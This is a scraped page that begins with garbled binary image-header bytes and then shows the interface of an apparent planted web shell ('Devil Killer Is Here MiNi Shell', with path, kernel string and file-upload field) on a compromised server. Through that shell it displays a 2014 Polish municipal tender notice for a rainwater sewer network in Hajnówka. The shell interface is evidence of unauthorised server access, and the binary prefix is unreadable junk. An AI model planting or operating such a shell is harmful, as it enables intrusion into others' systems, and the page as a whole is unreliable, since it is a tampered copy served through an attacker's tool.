JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140314/86336-N-2014.html

<p class="kh_header"><b>Hajnówka: Budowa sieci kanalizacji deszczowej w Hajnówce</b><br>
<b>Numer ogłoszenia: 86336 - 2014; data zamieszczenia: 14.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hajnówka , ul. Aleksego Zina 1, 17-200 Hajnówka, woj. podlaskie, tel. 085 6822180, 6822875, faks 085 6822994.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hajnowka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.hajnowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji deszczowej w Hajnówce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Budowa kanalizacji deszczowej w ul. Gruntowej,
a) przycisk rurami o śr. nominalnej 508 mm metoda wibrową             - 8 m
b) rurociąg z rur PVC SN8 łączony na wcisk  O 300 mm                     - 261,20 m
c) rurociąg z rur PP SN8 łączony na wcisk  O 300 mm                         - 14,34 m
d) przykanaliki z rur PVC SN8 łączony na wcisk  O 200 mm              - 88,60 m
e) studnie rewizyjne z kręgów betonowych O 1200 mm                       - 7 studni
f) studnie kanalizacyjne systemowe O 425 mm - zamknięcie rurą teleskopową - 1 sztuk
g) studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm  bez syfonu -  
    jezdniowe -  4 szt.
h) studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm  bez syfonu 
    krawężnikowo - jezdniowe -  9 szt.
i) studzienek ściekowych ulicznych betonowych  bez osadnikiem O 500 mm bez syfonu - 1 szt.
2. Budowa kanalizacji deszczowej w ul. Hibnera,
a) rurociąg z rur PVC SN8 łączony na wcisk  O 250 mm                      - 48,05 m
b) rurociąg z rur PVC SN8 łączony na wcisk  O 200 mm                         - 5,42 m
c) przykanaliki z rur PVC SN8 łączony na wcisk  O 200 mm                - 3,10 m
d) studnie kanalizacyjne systemowe O 425 mm - zamknięcie rurą teleskopową - 3 sztuk
e) studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm  bez syfonu 
    krawężnikowo - jezdniowe -  1 szt.
f) korytka odwodnienia liniowego - element L = 1,0 m   - 23,00 m
g) korytka odwodnienia liniowego - ścianka czołowa    - 2,00 m
h) korytka odwodnienia liniowego - element ewizyjny wraz z  skrzynką odpływową L = 0,5 m -  
    1,00 m
3. Budowa kanalizacji deszczowej na osiedlu Fabryka Chemiczna,
a) rurociąg z rur PVC SN8 łączony na wcisk  O 400 mm                      - 259,84 m
b) rurociąg z rur PVC SN8 łączony na wcisk  O 300 mm                      - 411,67 m
c) rurociąg z rur PVC SN8 łączony na wcisk  O 250 mm                      - 176,19 m
d) przykanaliki z rur PVC SN8 łączony na wcisk  O 200 mm                - 154,07 m
e) studnie rewizyjne z kręgów betonowych O 1000 mm                        - 1 studnia
f) studnie rewizyjne z kręgów betonowych O 1200 mm                        - 24 studni
g) studnie rewizyjne z kręgów betonowych O 1500 mm                        - 1 studnia
h) studnie rewizyjne z kręgów betonowych O 1800 mm w gotowym wykopie - podstawa studni 
     murowana  -  4,07 m3
i) studnie kanalizacyjne systemowe O 425 mm - zamknięcie rurą teleskopową - 5 sztuk
j) studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm  bez syfonu -  
    jezdniowe -  14 szt.
k) studzienek  ściekowych  ulicznych  betonowych  z  osadnikiem  O 500 mm  bez syfonu 
    krawężnikowo - jezdniowe -  13 szt.
3.1. Budowa urządzeń podczyszczających wody opadowe spływające z terenów Fabryka  
    Chemiczna,
a) rurociągi  z  rur  PVC  kanalizacyjnych  kielichowych  0,315  typ  S łączonych  na    
    uszczelki gumowe  - 4 m
b) rurociągi  z  rur  PVC  kanalizacyjnych  kielichowych  0,600  typ  S łączonych  na   
    uszczelki gumowe  - 7 m
c) rurociągi  z  rur  PVC  kanalizacyjnych  kielichowych  0,800  typ  S łączonych  na
     uszczelki gumowe  - 3 m
d) studnie rewizyjne z kręgów betonowych O 1200 mm z włazem żeliwnym typu ciężkiego  - 1 kpl
e) montaż  osadnika  ścieków  z  kręgów  betonowych  0,2000 - 1 kpl
f) montaż  separatora  ścieków  PSK  KOALA  II 80  o 2000 - 1 kpl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.30-2, 45.23.32.52-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferent  przystępujący  do  przetargu  zobowiązany  jest  wnieść  wadium  w  wysokości 20.000,00 zł  (słownie: dwadzieścia  tysięcy  złotych).
 b. wadium  może  być  wnoszone  w  jednej  lub  kilku  następujących  formach: 
          -  pieniądzu, 
          -  poręczeniach  bankowych, 
          -  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej, z  tym  że  poręczenie   
              kasy  jest  zawsze  poręczeniem  pieniężnym, 
          -  gwarancjach  bankowych,   
          -  gwarancjach  ubezpieczeniowych,   
          -  poręczeniach  udzielanych  przez  podmioty, o  których  mowa  w  art. 6b  ust. 5 pkt 2   
             ustawy  z  dnia  9 listopada  2000 roku  o  utworzeniu  Polskiej  Agencji  Rozwoju   
             Przedsiębiorczości  (Dz. U.  z  2007 r. Nr  42, poz. 275  wraz  z  późniejszymi  zmianami). 
      c. wadium  wnoszone  w  formie  pieniężnej  należy  wpłacić  przelewem  na  rachunek   
          bankowy  Nr  52 1020 1332 0000 1302 0037 7218  w  PKO  BP  S.A.  Oddział  w  Hajnówce   
          z  adnotacją  na  blankiecie  przelewu  Wadium - Budowa sieci kanalizacji deszczowej  w     
          Hajnówce  -  BI.271.3.2014. Dowód  wpłaty  lub  jego  kserokopię poświadczoną  za   
          zgodność  z  oryginałem  należy  dołączyć  do  oferty. Nie  dopuszcza  się wnoszenia  
          wadium  w  formie  pieniężnej  w  kasie  Zamawiającego. 
      d. wadium  wnoszone w pozostałych  formach  należy  załączyć  do  oferty  w  oryginale. 
      e. w przypadku wniesienia wadium w pozostałych formach przewidzianych  w  ust. 2 lit. b - f   
          Wykonawca  winien  przedłożyć  pisemną  gwarancję  zawierającą  informację, że  udzielona   
          gwarancja  stanowi  wadium  na  rzecz  Zamawiającego  do  przetargu  na  wybór   
          Wykonawcy  robót  budowlanych  w  ramach  zadania inwestycyjnego  pod  nazwą   
          Budowa sieci kanalizacji deszczowej  w Hajnówce - BI.271.3.2014, ważną przez  okres  
          związania  ofertą  określony  w  niniejszej  SIWZ  oraz  zobowiązanie  podmiotu 
          udzielającego  gwarancji  do:  
          -  nieodwołalnej, 
          -  bezwarunkowej, 
          -  płatnej na pierwsze żądanie Zamawiającego wypłaty wadium w  przypadkach  określonych    
          w  art. 46 ust. 4a i 5  ustawy  Pzp. 
      f. wadium  musi  być  wniesione  najpóźniej  do  wyznaczonego  terminu  składania  ofert,             
          tj.  do  dnia  31 marca  2014 roku, godz. 10.00
      g. w  przypadku  wadium  wnoszonego  w  pieniądzu  za  pomocą  przelewu  bankowego   
          decyduje  data  i  godzina  księgowania  na  rachunku  bankowym  Zamawiającego. 
      h. Wykonawca, który  nie  wniesie  wadium  lub  nie  zabezpieczy  oferty  akceptowalną  formą   
          wadium  zostanie  wykluczony  z  postępowania, a  jego  oferta  zostanie  odrzucona. 
      i. zwrot  lub  zatrzymanie  wniesionego  wadium  nastąpi  w  oparciu  o  postanowienia  art. 46    
          ustawy  z  dnia  29 stycznia  2004 roku  prawo  zamówień  publicznych  Dz. U. z  2013 roku          
          poz. 907 z  późniejszymi  zmianami.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże, że spełnia warunek ubiegania się o udzielenie zamówienia. Ocena spełniania warunku udziału w postępowaniu dokonywana będzie według formuły spełnia/nie spełnia na podstawie wyniku badania treści żądanego oświadczenia o spełnieniu warunków ubiegania się o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną robotę budowlaną odpowiadającą swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże, że spełnia warunek ubiegania się o udzielenie zamówienia. Ocena spełniania warunku udziału w postępowaniu dokonywana będzie według formuły spełnia/nie spełnia na podstawie wyniku badania treści żądanego oświadczenia o spełnieniu warunków ubiegania się o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku Wykonawca winien przedłożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, posiadających uprawnienia niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 roku Prawo budowlane - tj. uprawnienia budowlane wg Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83, poz. 578 wraz z późniejszymi zmianami) do kierowania robotami budowlanymi:
             -  Kierownik  Budowy branży drogowej  -  1 osoba :  
                                              -  uprawnienia  budowlane  do  kierowania  robotami     
                                                  budowlanymi  bez  ograniczeń  w  specjalności drogowej  lub  
                                                  odpowiadające  im uprawnienia  wydane  na  podstawie  wcześniej  
                                                  obowiązujących  przepisów, 
                                              -  doświadczenie  zawodowe - co  najmniej 3 lata od uzyskania
                                                  uprawnień,   
                                              -  ważne  zaświadczenie  o  przynależności  do  odpowiedniej  izby
                                                 samorządu  zawodowego,      
-	Kierownik Robót w branży sanitarnej - 1 osoba :
                                - uprawnienia budowlane do kierowania robotami bez
                                  ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i  
                                   urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i 
                                  kanalizacyjnych, lub odpowiadające im uprawnienia wydane na                     
                                  podstawie wcześniej obowiązujących przepisów,
                                             -  doświadczenie zawodowe - co najmniej 3 lata uzyskania  
                                                 uprawnień,
                                             -  ważne zaświadczenie o przynależności do odpowiedniej  izby  
                                                 samorządu zawodowego, 

Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom innych państw, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz. U. z 2013 r. poz. 1409 ze zmianami) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a.	Wykonawca musi wykazać posiadanie środków finansowych lub zdolności
kredytowej w wysokości nie mniejszej niż 300 000,00 zł.
b.	Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności związanej z przedmiotem zamówienia na wartość nie mniejszą niż wartość oferty (wg. kosztorysu ofertowego Wykonawcy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W trakcie realizacji umowy postanowienia umowy mogą ulec zmianom, jeżeli zmiany
będą korzystne dla Zamawiającego lub konieczność wprowadzenia zmian wynikać będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i będą dopuszczalne w granicach unormowania art. 144 ustawy Prawo zamówień publicznych.
2.	Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w przypadku:
a.	zmiany regulacji prawnych obowiązujących w chwili zawarcia umowy,
b. zmiany danych dotyczących Zamawiającego lub Wykonawcy,
c.	zmiany przez Wykonawcę formy wniesienia zabezpieczenia należytego wykonania umowy.
d. zmiany osób kierujących robotami budowlanymi, na osoby o uprawnieniach,
doświadczeniu i kwalifikacjach nie mniejszych niż wymagane w SIWZ,
e.	konieczności wprowadzenia zmian w dokumentacji projektowej, sposobie lub technologii
wykonania przedmiotu umowy,
f.	terminu przekazania przez Zamawiającego terenu budowy, jeżeli zajdą uzasadnione
okoliczności uniemożliwiające przekazanie terenu budowy w terminie określonym
Umową,
g.	zmiany terminu i zakresu wykonania zamówienia, które zaistniały w trakcie realizacji
przedmiotu umowy z przyczyn niezależnych od Zamawiającego i od Wykonawcy tj.:
- wystąpienia niekorzystnych warunków atmosferycznych, geologicznych lub
hydrologicznych uniemożliwiających ze względów technologicznych wykonanie przedmiotu umowy w ustalonym terminie lub negatywnie wpływających na jakość wykonania lub trwałość przedmiotu umowy,
- wystąpienia odkryć archeologicznych,
- natrafienia na niewybuchy i niewypały,
- wystąpienia klęsk żywiołowych (powódź, pożar itp.),
    h. zmiana zasad finansowania zamówienia,
i. konieczności dostosowania treści umowy do postanowień umowy zawartej przez Zamawiającego z instytucją współfinansującą realizację zamówienia.
3.	Warunki ewentualnych zmian - stosownie do czasu trwania okoliczności będących
podstawą zmiany.
4. Zmiana postanowień zawartej umowy w przypadkach określonych w pkt. 2 nie może prowadzić do zwiększenia wynagrodzenia Wykonawcy.
5. Wszystkie powyższe zapisy stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.hajnowka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1
fax. 85 674 3746, tel. 85 682 6443.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.03.2014 godzina 10:00, miejsce: Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1, 
                                                 pok. Nr  219  -  sekretariat  Urzędu..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt  jest  realizowany  w  ramach  Programu  Współpracy  Transgranicznej  Polska - Białoruś - Ukraina  na  lata  2007 - 2013  finansowanego  z  Europejskiego  Instrumentu  Sąsiedztwa  i  Partnerstwa.</p>
